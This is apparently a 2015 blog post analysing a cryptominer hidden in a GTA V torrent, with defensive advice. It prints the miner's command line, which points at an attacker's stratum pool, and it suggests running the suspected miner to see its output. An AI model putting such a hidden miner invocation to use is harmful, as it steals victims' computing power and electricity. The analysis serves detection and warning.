Hidden Cryptominers in Game torrents. en

By Biersteker on Friday 19 June 2015 21:17 - Comments (15)
Category: -, Views: 6.878

Hiding coinminers in popular programs is something that is going on for quite some time now.
We have seen cryptominers as Javascript on website and how DVRs and NAS devices have been turned into Dogecoin miners. But the most used variant is just hiding the miner in torrent releases. In this article we will be looking at one torrent in specific.
GTA V !

Why are we looking at GTA V?

Well there are some good reasons for that.
1. If you can play GtaV on your pc, you have a rather modern system. With enough cpu/gpu power.
2. It is one of the biggest gametorrents at this time.
3. It's big. So most people will download one version, but won't redownload 60 gb to find a second/third version.
4. It has a hidden miner in it.
Where is the miner hidden, what does it do?
http://i.imgur.com/XNoe7RV.png
In this case the miner is hidden in your steamfolder. (A file mbm and some .cl kernelfiles). This is a modified version of sgminer.
http://i.imgur.com/lSQb8Y5.png
After some searching in the file. I found out that the workername is overltcx.<randomnumbers> and the algorithm was x11 and it connects to steam22865.net which is a stratum-proxy. Redirecting from pool to pool.

And of course the output of mdm file.

code:
1
2
3
4
5
6
7
8
9
mdm --kernel x11mod -o stratum+tcp://steam22865.net:9001 -u overxltc.2161 -p x -I 13 
[16:37:09] Started sgminer                     
[16:37:10] WARNING: GPU_MAX_ALLOC_PERCENT is not specified!                    
[16:37:10] WARNING: GPU_USE_SYNC_OBJECTS is not specified!                    
[16:37:10] Kernel x11mod is experimental.                    
[16:37:10] Probing for an alive pool                    
[16:37:10] Pool 0 difficulty changed to 0.015                    
[16:37:11] Network diff set to 3.2K                    
(5s):502.8K (avg):1.295Mh/s | A:0  R:0  HW:0  WU:0.000/m



If you find a miner on your computer you can get the output even if it's a background program by changing the file extention to exe. Then open the folder in command. And just run filename > output.txt.

Back to the output: x11mod ?!?

X11 is a fairly wide used mining algorithm, but the coin with the biggest marketcap and anonymity seemed like a good place to start. So assuming it was mining Dash/DarkCoin, lets try a google search on overxltc.
http://i.imgur.com/3T1IXnU.png

This resulted in the finding a worker called overltcx at dash.coinmine.pl (and some very simillar names). We also see overxltc and aliasses mentioned in BSTY2 (GlobalBoost-Y) and Uro threads.

http://i.imgur.com/859rhAC.png
This is some scary hashrate.

As you can see these workers produce an insane hashrate. So lets make a hardware calculation:

The used miner is sgminer, And the used kernel is darkcoin-mod-X11

Lets take an average mid-high end gpu like the AMD RADEON R280x that will produce around 4.2 Mh/s using darkcoinmod-x11 kernel. (The kernel is important to know to estimate the amount of rigs that are mining, If this miner was using Wolf` X11 kernel, we would have to assume a 280x would do 6 Mh/s)

5.857 Mh/s divided by 4.2 Mh/s, the average hashrate of a 280x, makes little under 1400 280xlike GPUs.
Normally your GPU power usage for a 280x would be idle 15 watt. But for mining, it will use around 250 watt.
(Source: http://www.tomshardware.c...270x-r7-260x,3635-18.html)

That means that every day since the malicious GTAV torrent was released, 235 watt x 1400 GPU's around 0,33 MegaWatt is needed. With powercosts of 0.20 $ per kWh, the powercosts for this amount of GPU's would be around $65,80 an hour, or $1579,20 daily.

What can you do against unwanted miners?

1. First of all, you probably shouldn’t download shady torrents that will cost you more then you buying the game. (power-costs , hardware wear, PSU units that are not capable of handling the continuous load).
2. Run you own miner, and check you hashrate. The sgminer miner in the torrent does not take priority over your own miners.
3. Check you GPU load!. If you GPU load is high, and you clockspeeds are in Performance mode, without running anything heavy, that could be a sign that you have picked up a unwanted miner.
4. Removal instructions:
https://www.reddit.com/r/...ng_bitcion_miners_isssue/


In the end is a question of who do you like to support, gamedevelopers that made a good game or the cracker / releasegroup or repacker that abuses your gpu and that does over 1500 dollar daily in economic damages?